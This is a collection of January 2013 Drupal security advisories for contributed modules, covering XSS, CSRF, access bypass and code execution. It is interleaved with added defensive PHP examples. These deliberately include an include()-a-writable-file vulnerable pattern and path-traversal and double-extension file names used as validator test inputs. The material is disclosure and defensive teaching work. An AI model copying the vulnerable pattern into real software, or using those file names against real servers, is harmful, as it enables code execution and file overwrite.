[1] http://drupal.org/project/debuild
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/debuild
[5] http://drupal.org/project/debuild
[6] http://drupal.org/user/2322458
[7] http://drupal.org/user/36762
[8] http://drupal.org/contact
[9] http://drupal.org/security-team
[10] http://drupal.org/writing-secure-code
[11] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2013-011 - email2image - Access Bypass - Unsupported
View online: http://drupal.org/node/1903264

  * Advisory ID: DRUPAL-SA-CONTRIB-2013-011
  * Project: email2image [1] (third-party module)
  * Version: 6.x
  * Date: 2013-January-30
  * Security risk: Moderately critical [2]
  * Exploitable from: Remote
  * Vulnerability: Access bypass

DESCRIPTION

This module creates images of user email addresses and email fields.

The module doesn't sufficiently check node access restrictions when displaying such fields.

This vulnerability is mitigated by the fact that it only impacts sites using node access.

CVE IDENTIFIER(S) ISSUED

  * A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes.

VERSIONS AFFECTED

  * All email2image 6.x-1.x and 6.x-2.x versions.

Drupal core is not affected. If you do not use the contributed email2image [4] module, there is nothing you need to do.

SOLUTION

Install the latest version:

  * If you use the email2image module for Drupal 6.x, you should uninstall the module

Also see the email2image [5] project page.

REPORTED BY

  * Ayesh Karunaratne [6]

FIXED BY

Not applicable.

COORDINATED BY

  * Lee Rowlands [7] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [8].

Learn more about the Drupal Security team and their policies [9], writing secure code for Drupal [10], and securing your site [11].

[1] http://drupal.org/project/email2image
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/email2image
[5] http://drupal.org/project/email2image
[6] http://drupal.org/user/796148
[7] http://drupal.org/user/395439
[8] http://drupal.org/contact
[9] http://drupal.org/security-team
[10] http://drupal.org/writing-secure-code
[11] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2013-010 - Search API sorts - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1896782

* Advisory ID: DRUPAL-SA-CONTRIB-2013-010
* Project: Search API sorts [1] (third-party module)
* Version: 7.x
* Date: 2013-January-23
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting

DESCRIPTION

This module enables you to sort by Search API facets. The module doesn't sufficiently filter user entered text in field labels.

This vulnerability is mitigated by the fact that an attacker must have a role with the ability to modify field labels such as "administer taxonomy".

CVE IDENTIFIER(S) ISSUED

* /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./

VERSIONS AFFECTED

* Search API Sorts 7.x-1.x versions prior to 7.x-1.4.

Drupal core is not affected. If you do not use the contributed Search API sorts [4] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the Search API Sorts module for Drupal 7.x, upgrade to Search API Sorts 7.x-1.4 [5]

Also see the Search API sorts [6] project page.

REPORTED BY

* Francisco José Cruz Romanos [7]

FIXED BY

* Francisco José Cruz Romanos [8]

COORDINATED BY

* Klaus Purer [9] of the Drupal Security Team
* Greg Knaddison [10] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11]. Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14].

[1] http://drupal.org/project/1097626
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/1097626
[5] http://drupal.org/node/1896756
[6] http://drupal.org/project/1097626
[7] https://drupal.org/user/848238
[8] https://drupal.org/user/848238
[9] http://drupal.org/user/262198
[10] http://drupal.org/user/36762
[11] http://drupal.org/contact
[12] http://drupal.org/security-team
[13] http://drupal.org/writing-secure-code
[14] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2013-009 - Keyboard Shortcut Utility - Access Bypass - module unsupported
View online: http://drupal.org/node/1896752

* Advisory ID: DRUPAL-SA-CONTRIB-2013-009
* Project: Keyboard Shortcut Utility [1] (third-party module)
* Version: 7.x
* Date: 2013-January-23
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Access bypass

DESCRIPTION

The Keyboard Shortcut Utility module enables you to create keyboard shortcuts on your website. You can create a shortcut to go to a page (internal or external) or call a JavaScript function.

The module doesn't sufficiently check node access to view nodes for users who have "view shortcuts" permission. It also doesn't check node access to view, edit, or delete nodes for users who have the "admin shortcuts" permission.

This vulnerability is mitigated by the fact that an attacker must have a role with the permission "view shortcuts" or "admin shortcuts".

CVE IDENTIFIER(S) ISSUED

* /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./

VERSIONS AFFECTED

* All Keyboard Shortcut Utility 7.x-1.x versions.

Drupal core is not affected. If you do not use the contributed Keyboard Shortcut Utility [4] module, there is nothing you need to do.

SOLUTION

Uninstall the module. No patched version is available.

Also see the Keyboard Shortcut Utility [5] project page.

REPORTED BY

* Michael Griego [6]

FIXED BY

Not applicable.

COORDINATED BY

* Ivo Van Geertruyen [7] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [8]. Learn more about the Drupal Security team and their policies [9], writing secure code for Drupal [10], and securing your site [11].

[1] http://drupal.org/project/keyboard_shortcut
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/keyboard_shortcut
[5] http://drupal.org/project/keyboard_shortcut
[6] http://drupal.org/user/524484
[7] http://drupal.org/user/383424
[8] http://drupal.org/contact
[9] http://drupal.org/security-team
[10] http://drupal.org/writing-secure-code
[11] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2013-008 - CurvyCorners - Cross Site Scripting (XSS) - module unsupported
View online: http://drupal.org/node/1896718

* Advisory ID: DRUPAL-SA-CONTRIB-2013-008
* Project: CurvyCorners [1] (third-party module)
* Version: 6.x, 7.x
* Date: 2013-January-23
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting

DESCRIPTION

The CurvyCorners module enables you to create rounded corners on HTML block elements. The module doesn't sufficiently filter user entered text when being displayed.

This vulnerability is mitigated by the fact that an attacker must have a role with the permission "administer curvycorners".

CVE IDENTIFIER(S) ISSUED

* CVE-2013-1393

VERSIONS AFFECTED

* All CurvyCorners 6.x-1.x versions.
* All CurvyCorners 7.x-1.x versions.

Drupal core is not affected. If you do not use the contributed CurvyCorners [3] module, there is nothing you need to do.

SOLUTION

* If you use the CurvyCorners module, uninstall it: there is no patch available to fix this issue.

Also see the CurvyCorners [4] project page.

REPORTED BY

* rickauer [5]

FIXED BY

Not applicable.

COORDINATED BY

* Greg Knaddison [6] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [7]. Learn more about the Drupal Security team and their policies [8], writing secure code for Drupal [9], and securing your site [10].

[1] http://drupal.org/project/curvycorners
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/curvycorners
[4] http://drupal.org/project/curvycorners
[5] http://drupal.org/user/69553
[6] http://drupal.org/user/36762
[7] http://drupal.org/contact
[8] http://drupal.org/security-team
[9] http://drupal.org/writing-secure-code
[10] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2013-007 User Relationships - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1896720

* Advisory ID: DRUPAL-SA-CONTRIB-2013-007
* Project: User Relationships [1] (third-party module)
* Version: 6.x, 7.x
* Date: 2013-January-23
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting

DESCRIPTION

The User Relationships module allows you to create multiple relationship types and maintain relationships between users in your Drupal site.

The module does not sufficiently escape relationship names before display. This allows users with the correct permissions to create relationship names containing arbitrary JavaScript which will then be executed by the browser.

This vulnerability is mitigated by the fact that an attacker must have a role with the permission "administer user relationships".

CVE IDENTIFIER(S) ISSUED

* /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./

VERSIONS AFFECTED

* User Relationships 6.x-1.x versions prior to 6.x-1.4
* User Relationships 7.x-1.x versions prior to 7.x-1.0-alpha5

Drupal core is not affected. If you do not use the contributed User Relationships [4] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the User Relationships module for Drupal 6.x, upgrade to User Relationships 6.x-1.4 [5]
* If you use the User Relationships module for Drupal 7.x, upgrade to User Relationships 7.x-1.0-alpha5 [6]

Also see the User Relationships [7] project page.

REPORTED BY

* Klaus Purer [8] of the Drupal Security Team

FIXED BY

* Mark Ferree [9] the module maintainer

COORDINATED BY

* Klaus Purer [10] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11]. Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14].

[1] http://drupal.org/project/user_relationships
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/user_relationships
[5] http://drupal.org/node/1896272
[6] http://drupal.org/node/1896276
[7] http://drupal.org/project/user_relationships
[8] http://drupal.org/user/262198
[9] http://drupal.org/user/76245
[10] http://drupal.org/user/262198
[11] http://drupal.org/contact
[12] http://drupal.org/security-team
[13] http://drupal.org/writing-secure-code
[14] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2013-006 - Video - Arbitrary Code Execution
View online: http://drupal.org/node/1896714

* Advisory ID: DRUPAL-SA-CONTRIB-2013-006
* Project: Video [1] (third-party module)
* Version: 7.x
* Date: 2013-January-23
* Security risk: Less critical [2]
* Exploitable from: Remote
* Vulnerability: Arbitrary PHP code execution

DESCRIPTION

The video module enables you to upload video and audio files and transcode them into other formats and sizes using other tools like FFmpeg or Zencoder.

The module saves information about the FFmpeg executable in a temporary PHP file, but doesn't check if the file has been tampered with when reading the file, allowing any PHP code in that file to be executed.

This vulnerability is mitigated by the fact that an attacker must have write access to the temporary PHP file (something which is not known to be possible via the module itself). Sites not using the FFmpeg transcoder are only vulnerable if the attacker has the 'administer site configuration' permission in order to change the transcoder to FFmpeg.

CVE IDENTIFIER(S) ISSUED

* /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./

VERSIONS AFFECTED

* Video 7.x-2.x versions prior to 7.x-2.9.

Drupal core is not affected. If you do not use the contributed Video [4] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the Video module for Drupal 7.x, upgrade to Video 7.x-2.9 [5]

Also see the Video [6] project page.

REPORTED BY

* Joris van Eijden [7] of the Drupal Security Team

FIXED BY

* Jorrit Schippers [8] the module maintainer

COORDINATED BY

* Greg Knaddison [9] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10]. Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13].

[1] http://drupal.org/project/video
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/video
[5] http://drupal.org/node/1895234
[6] http://drupal.org/project/video
[7] http://drupal.org/user/892998
[8] http://drupal.org/user/161217
[9] http://drupal.org/user/36762
[10] http://drupal.org/contact
[11] http://drupal.org/security-team
[12] http://drupal.org/writing-secure-code
[13] http://drupal.org/security/secure-configuration
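The Video advisory describes a cache file written as PHP source and later executed by the reader, so anyone who can write that file runs code in the web server. The added example below is plain PHP that is not the Video module's code: it shows that vulnerable pattern beside a reader that treats the cache as data (JSON) and refuses it unless an HMAC computed with a key the file writer does not hold verifies. The file path, the FFmpeg metadata and the key are constructed for the example; in a Drupal site the key would be the site's private key from settings or the database, and the check is only meaningful while that key stays unreadable to whoever can write the temporary file.

```php
<?php
// Added example, not code from the Video module. Demonstrates: never execute a
// cache file; store it as data and authenticate it before trusting its content.
// CACHE_HMAC_KEY is a constructed stand-in for a site-private key.

const CACHE_HMAC_KEY = 'constructed-example-key-do-not-reuse';

/** VULNERABLE pattern: metadata written as PHP source and later include()d. */
function write_ffmpeg_info_as_php(string $path, array $info): void
{
    file_put_contents($path, '<?php $ffmpeg_info = ' . var_export($info, true) . ';');
}

/** The reader executes whatever the file now contains, not only what was written. */
function read_ffmpeg_info_as_php(string $path): array
{
    include $path;            // arbitrary PHP in $path runs here
    return $ffmpeg_info;
}

/** FIXED pattern: serialise as data and append an HMAC over the exact bytes. */
function write_ffmpeg_info(string $path, array $info): void
{
    $json = json_encode($info);
    $mac  = hash_hmac('sha256', $json, CACHE_HMAC_KEY);
    file_put_contents($path, $mac . "\n" . $json, LOCK_EX);
}

/**
 * Returns the cached metadata, or null when the file is missing, malformed or
 * fails authentication. A null tells the caller to re-detect the tool instead
 * of trusting the file.
 */
function read_ffmpeg_info(string $path): ?array
{
    $raw = @file_get_contents($path);
    if ($raw === false || strpos($raw, "\n") === false) {
        return null;
    }
    list($mac, $json) = explode("\n", $raw, 2);
    // Constant-time comparison; the MAC covers the bytes that json_decode will see.
    if (!hash_equals(hash_hmac('sha256', $json, CACHE_HMAC_KEY), $mac)) {
        return null;
    }
    $info = json_decode($json, true);
    return is_array($info) ? $info : null;
}

// Constructed demonstration: write, read back, tamper, read back again.
$tmp = sys_get_temp_dir() . '/ffmpeg_info_' . getmypid() . '.dat';
write_ffmpeg_info($tmp, ['path' => '/usr/bin/ffmpeg', 'version' => '1.0']);
var_dump(read_ffmpeg_info($tmp));                       // array with both keys

// An attacker with write access swaps the executable path; the MAC no longer matches.
file_put_contents($tmp, str_replace('/usr/bin/ffmpeg', '/tmp/evil', file_get_contents($tmp)));
var_dump(read_ffmpeg_info($tmp));                       // NULL: rejected, nothing executed
unlink($tmp);
```

If the module genuinely needs a PHP file (for instance for opcode caching), the alternative is to write it somewhere only the deploying user can write and to keep the temporary directory out of the picture entirely; authenticating a file in a world-writable location is a mitigation, not a substitute for correct permissions.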
[Full-disclosure] [Security-news] SA-CORE-2013-001 - Drupal core - Multiple vulnerabilities
reached at security at drupal.org or via the contact form at http://drupal.org/contact [34]. Learn more about the Drupal Security team and their policies [35], writing secure code for Drupal [36], and securing your site [37].

[1] http://drupal.org/project/drupal
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/drupal-6.28-release-notes
[5] http://drupal.org/drupal-7.19-release-notes
[6] http://drupal.org/project/drupal
[7] http://drupal.org/user/124982
[8] http://drupal.org/user/1924632
[9] http://drupal.org/user/1605796
[10] http://drupal.org/user/204187
[11] http://drupal.org/user/855656
[12] http://drupal.org/user/245825
[13] http://drupal.org/user/598310
[14] http://drupal.org/user/172987
[15] http://drupal.org/user/264148
[16] http://drupal.org/user/748566
[17] http://drupal.org/user/96647
[18] http://drupal.org/user/36762
[19] http://drupal.org/user/124982
[20] http://drupal.org/user/22211
[21] http://drupal.org/user/1924632
[22] http://drupal.org/user/426416
[23] http://drupal.org/user/124982
[24] http://drupal.org/user/49851
[25] http://drupal.org/user/17943
[26] http://drupal.org/user/855656
[27] http://drupal.org/user/124982
[28] http://drupal.org/user/4166
[29] http://drupal.org/user/52142
[30] http://drupal.org/user/36762
[31] http://drupal.org/user/17943
[32] http://drupal.org/user/49851
[33] http://drupal.org/user/148199
[34] http://drupal.org/contact
[35] http://drupal.org/security-team
[36] http://drupal.org/writing-secure-code
[37] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2013-005 - Mark Complete Module - Cross Site Request Forgery (CSRF)
View online: http://drupal.org/node/1890538

* Advisory ID: DRUPAL-SA-CONTRIB-2013-005
* Project: Mark Complete [1] (third-party module)
* Version: 7.x
* Date: 2013-January-16
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Request Forgery

DESCRIPTION

This module enables you to update a date field on a node via an AJAX link on the node view page. The module doesn't sufficiently guard against Cross Site Request Forgery (CSRF).

CVE IDENTIFIER(S) ISSUED

* /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./

VERSIONS AFFECTED

* Mark Complete 7.x-1.x versions prior to 7.x-1.1.

Drupal core is not affected. If you do not use the contributed Mark Complete [4] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the Mark Complete module for Drupal 7.x, upgrade to Mark Complete 7.x-1.1 [5]

Also see the Mark Complete [6] project page.

REPORTED BY

* Lee Rowlands [7] of the Drupal Security Team

FIXED BY

* Leighton Whiting [8] the module maintainer
* Lee Rowlands [9] of the Drupal Security Team
* Fox [10] of the Drupal Security Team

COORDINATED BY

* Greg Knaddison [11] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12]. Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15].

[1] http://drupal.org/project/mark_complete
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/mark_complete
[5] http://drupal.org/node/1890566
[6] http://drupal.org/project/mark_complete
[7] http://drupal.org/user/395439
[8] http://drupal.org/user/307704
[9] http://drupal.org/user/395439
[10] http://drupal.org/user/426416
[11] http://drupal.org/user/36762
[12] http://drupal.org/contact
[13] http://drupal.org/security-team
[14] http://drupal.org/writing-secure-code
[15] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2013-003 - RESTful Web Services - Cross site request forgery (CSRF)
View online: http://drupal.org/node/1890222

* Advisory ID: DRUPAL-SA-CONTRIB-2013-003
* Project: RESTful Web Services [1] (third-party module)
* Version: 7.x
* Date: 2013-January-16
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Request Forgery

DESCRIPTION

This module enables you to expose Drupal entities as RESTful web services. It provides a machine-readable interface to exchange resources in JSON, XML and RDF.

The module doesn't sufficiently verify POST requests thereby exposing a Cross Site Request Forgery vulnerability.

This vulnerability is mitigated by the fact that an attacker must trick an authenticated user onto a prepared page that leverages a weakness in certain browser plugins.

CVE IDENTIFIER(S) ISSUED

* /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./

VERSIONS AFFECTED

* RESTWS 7.x-1.x versions prior to 7.x-1.2.
* RESTWS 7.x-2.x versions prior to 7.x-2.0-alpha4.

Drupal core is not affected. If you do not use the contributed RESTful Web Services [4] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the RESTWS 1.x module for Drupal 7.x, upgrade to RESTWS 7.x-1.2 [5]
* If you use the RESTWS 2.x module for Drupal 7.x, upgrade to RESTWS 7.x-2.0-alpha4 [6]

Also see the RESTful Web Services [7] project page.

REPORTED BY

* Fredrik Lassen [8]
* Klaus Purer [9] of the Drupal Security Team

FIXED BY

* Klaus Purer [10] the module maintainer

COORDINATED BY

* Klaus Purer [11] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12]. Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15].

[1] http://drupal.org/project/restws
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/restws
[5] http://drupal.org/node/1890212
[6] http://drupal.org/node/1890216
[7] http://drupal.org/project/restws
[8] http://drupal.org/user/243377
[9] http://drupal.org/user/262198
[10] http://drupal.org/user/262198
[11] http://drupal.org/user/262198
[12] http://drupal.org/contact
[13] http://drupal.org/security-team
[14] http://drupal.org/writing-secure-code
[15] http://drupal.org/security/secure-configuration
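Both CSRF advisories above (Mark Complete's AJAX link and RESTWS's POST endpoints) come down to a state-changing request that the server accepts on the strength of the session cookie alone, which the victim's browser attaches to any request a hostile page triggers. The added example below is plain PHP and not code from either module: it issues a token bound to the session and to the specific action, modelled on what Drupal's drupal_get_token() and drupal_valid_token() do, and rejects any request whose token does not verify. The private key, session identifiers, node record and request arrays are constructed; the token is carried in the link's query string here, and carrying it in a request header for API-style clients is an assumption of the design rather than something the advisory states.

```php
<?php
// Added example, not code from the Mark Complete or RESTWS modules.
// Demonstrates: a per-session, per-action anti-CSRF token checked on a
// state-changing request. SITE_PRIVATE_KEY and the session ids are constructed.

const SITE_PRIVATE_KEY = 'constructed-private-key-replace-in-production';

/** Token bound to this session and to the exact action it authorises. */
function csrf_token(string $session_id, string $value): string
{
    return hash_hmac('sha256', $session_id . ':' . $value, SITE_PRIVATE_KEY);
}

function csrf_token_valid(string $token, string $session_id, string $value): bool
{
    return hash_equals(csrf_token($session_id, $value), $token);
}

/** The AJAX link rendered into the node page for the current user. */
function mark_complete_link(string $session_id, int $nid): string
{
    return "/mark_complete/$nid?token=" . csrf_token($session_id, "mark_complete/$nid");
}

/**
 * Request handler. $request is a constructed stand-in for the HTTP method,
 * query parameters and session of one incoming request; returns the status code.
 */
function mark_complete_handler(array $request, array &$nodes): int
{
    $nid = (int) $request['nid'];
    if (!isset($nodes[$nid])) {
        return 404;
    }
    // A hostile page can make the victim's browser send the cookie, but it cannot
    // read this session's token, and a token minted for its own session fails here.
    $token = $request['query']['token'] ?? '';
    if ($request['method'] !== 'POST'
        || !csrf_token_valid($token, $request['session_id'], "mark_complete/$nid")) {
        return 403;
    }
    $nodes[$nid]['completed'] = date('Y-m-d');
    return 200;
}

// Constructed data: one node and the victim's session.
$nodes   = [42 => ['title' => 'Lesson 1', 'completed' => null]];
$session = 'sess-constructed-abc123';

// 1. Legitimate click: the token comes from the link the site rendered.
parse_str((string) parse_url(mark_complete_link($session, 42), PHP_URL_QUERY), $q);
echo mark_complete_handler(
    ['method' => 'POST', 'nid' => 42, 'query' => $q, 'session_id' => $session], $nodes
), "\n";                                                       // 200

// 2. Forged cross-site request: right cookie, but a token from the attacker's session.
$forged = ['token' => csrf_token('attacker-session', 'mark_complete/42')];
echo mark_complete_handler(
    ['method' => 'POST', 'nid' => 42, 'query' => $forged, 'session_id' => $session], $nodes
), "\n";                                                       // 403

// 3. Same token replayed against a different action: the binding to the value fails.
echo mark_complete_handler(
    ['method' => 'POST', 'nid' => 42, 'query' => ['token' => csrf_token($session, 'delete/42')], 'session_id' => $session], $nodes
), "\n";                                                       // 403
```

The RESTWS mitigation text is the reason the method check alone is not enough: a plugin that can send a cross-origin POST with an arbitrary Content-Type defeats "only accept application/json", whereas it still cannot read a token that only the legitimate origin was given. Bind the token to the session and the action, compare it in constant time, and do not accept it on GET for anything that writes.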
[Full-disclosure] [Security-news] SA-CONTRIB-2013-004 - Live CSS - Arbitrary Code Execution
View online: http://drupal.org/node/1890318

* Advisory ID: DRUPAL-SA-CONTRIB-2013-004
* Project: Live CSS [1] (third-party module)
* Version: 6.x, 7.x
* Date: 2013-January-16
* Security risk: Highly critical [2]
* Exploitable from: Remote
* Vulnerability: Arbitrary PHP code execution

DESCRIPTION

This module enables you to save CSS and LESS files on the server via your browser. The module doesn't check that the file being saved isn't a script or executable.

This vulnerability is mitigated by the fact that an attacker must have a role with the permission "administer CSS".

CVE IDENTIFIER(S) ISSUED

* /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./

VERSIONS AFFECTED

* Live CSS 6.x-2.x versions prior to 6.x-2.1 [4].
* Live CSS 7.x-2.x versions prior to 7.x-2.7 [5].

Drupal core is not affected. If you do not use the contributed Live CSS [6] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the Live CSS module for Drupal 6.x, upgrade to 6.x-2.1 [7].
* If you use the Live CSS module for Drupal 7.x, upgrade to 7.x-2.7 [8].

Also see the Live CSS [9] project page.

REPORTED BY

* Ryan Garrett [10]

FIXED BY

* Guy Bedford [11] the module maintainer

COORDINATED BY

* Greg Knaddison [12] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [13]. Learn more about the Drupal Security team and their policies [14], writing secure code for Drupal [15], and securing your site [16].

[1] http://drupal.org/project/live_css
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/node/1883978
[5] http://drupal.org/node/1883976
[6] http://drupal.org/project/live_css
[7] http://drupal.org/node/1883978
[8] http://drupal.org/node/1883976
[9] http://drupal.org/project/live_css
[10] http://drupal.org/user/2392210
[11] http://drupal.org/user/746802
[12] http://drupal.org/user/27
[13] http://drupal.org/contact
[14] http://drupal.org/security-team
[15] http://drupal.org/writing-secure-code
[16] http://drupal.org/security/secure-configuration
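An endpoint that writes browser-supplied content to a browser-supplied file name under the web root must decide what it is willing to write before touching the filesystem. The added example below is plain PHP, not the Live CSS module's code: it confines the target to a fixed base directory, rejects path traversal, allows exactly one extension from an allow-list, and refuses multi-extension names such as "shell.php.css" that some web server configurations still execute. The base directory and the candidate file names are constructed for the example; in Drupal the same job is done by file_validate_extensions() and file_munge_filename(), and the directory should additionally be served with script execution disabled, as Drupal's own files directories are.

```php
<?php
// Added example, not code from the Live CSS module. Demonstrates: validating a
// user-controlled file name against a fixed directory and an extension
// allow-list before writing. $base and the names in the demo are constructed.

const ALLOWED_EXTENSIONS = ['css', 'less'];

/**
 * Return the absolute path the request may write, or null when the name is
 * unacceptable. Directory segments and the stem are restricted to a plain
 * identifier charset, which also rules out "", "." and "..".
 */
function resolve_stylesheet_path(string $base_dir, string $requested): ?string
{
    $base = realpath($base_dir);
    if ($base === false || $requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    $parts = explode('/', str_replace('\\', '/', $requested));
    $name  = array_pop($parts);
    foreach ($parts as $dir) {
        if (!preg_match('/^[A-Za-z0-9_-]+$/', $dir)) {
            return null;                         // "..", absolute paths, odd characters
        }
    }
    // Exactly one extension, from the allow-list: rejects "shell.php" and "shell.php.css".
    if (!preg_match('/^([A-Za-z0-9_-]+)\.([A-Za-z]+)$/', $name, $m)
        || !in_array(strtolower($m[2]), ALLOWED_EXTENSIONS, true)) {
        return null;
    }
    $target = $base . '/' . implode('/', array_merge($parts, [$name]));
    // Belt and braces: the final path must still lie inside the base directory.
    return strpos($target, $base . '/') === 0 ? $target : null;
}

/** Write $contents to the validated location; false when the name was refused. */
function save_stylesheet(string $base_dir, string $requested, string $contents): bool
{
    $target = resolve_stylesheet_path($base_dir, $requested);
    if ($target === null) {
        return false;
    }
    $dir = dirname($target);
    if (!is_dir($dir) && !mkdir($dir, 0755, true)) {
        return false;
    }
    return file_put_contents($target, $contents, LOCK_EX) !== false;
}

// Constructed demonstration against a scratch directory.
$base = sys_get_temp_dir() . '/livecss_demo_' . getmypid();
mkdir($base);
$candidates = [
    'theme/style.css',     // written
    'style.CSS',           // written (extension compared case-insensitively)
    'shell.php',           // refused: extension not allowed
    'shell.php.css',       // refused: more than one extension
    '../../settings.php',  // refused: parent segment
    'a.css/../x.php',      // refused: "a.css" is not a valid directory name
    '/etc/cron.d/x.css',   // refused: absolute path
];
foreach ($candidates as $name) {
    printf("%-22s -> %s\n", $name, save_stylesheet($base, $name, '/* test */') ? 'written' : 'refused');
}
foreach (glob("$base/theme/*") as $f) { unlink($f); }
foreach (glob("$base/*") as $f) { is_dir($f) ? rmdir($f) : unlink($f); }
rmdir($base);
```

The allow-list is the control; the traversal and double-extension checks exist because a single extension test on the whole name ("ends with .css") passes both "x.php.css" and "../x.css" and is exactly the shortcut that turns a stylesheet editor into a file-drop for scripts.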
[Full-disclosure] [Security-news] SA-CONTRIB-2013-002 - Payment - Access Bypass
View online: http://drupal.org/node/1884360

* Advisory ID: DRUPAL-SA-CONTRIB-2013-002
* Project: Payment [1] (third-party module)
* Version: 7.x
* Date: 2013-January-09
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Access bypass

DESCRIPTION

Payment enables other modules to make payments using a variety of payment processing services. The module incorrectly grants access when checking if a user can view payments, allowing a user to access the payments of other users.

CVE IDENTIFIER(S) ISSUED

* /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./

VERSIONS AFFECTED

* Payment 7.x-1.x versions prior to 7.x-1.3.

Drupal core is not affected. If you do not use the contributed Payment [4] module, there is nothing you need to do.

SOLUTION

Update to Payment 7.x-1.3 [5] or later.

Also see the Payment [6] project page.

REPORTED BY

* Dario Emmanuel Godoy Rojas [7]

FIXED BY

* Bart Feenstra [8] (the module maintainer)

COORDINATED BY

* Greg Knaddison [9] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10]. Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13].

[1] http://drupal.org/project/payment
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/payment
[5] http://drupal.org/node/1883830
[6] http://drupal.org/project/payment
[7] http://drupal.org/user/186754
[8] http://drupal.org/user/62965
[9] http://drupal.org/user/36762
[10] http://drupal.org/contact
[11] http://drupal.org/security-team
[12] http://drupal.org/writing-secure-code
[13] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2013-001 - Search API - Cross Site Scripting
View online: http://drupal.org/node/1884332

* Advisory ID: DRUPAL-SA-CONTRIB-2013-001
* Project: Search API [1] (third-party module)
* Version: 7.x
* Date: 2013-January-09
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting

DESCRIPTION

This module enables you to build searches using a wide range of features, data sources and backends.

The module doesn't sufficiently sanitize user input when displaying errors in a view with certain backends, including the database backend. This enables attackers to create a Reflected Cross Site Scripting attack by manipulating the URL. This is mitigated by the fact that the vulnerability only occurs with some backends (the Solr backend, e.g., is safe) and for certain common configurations of facets.

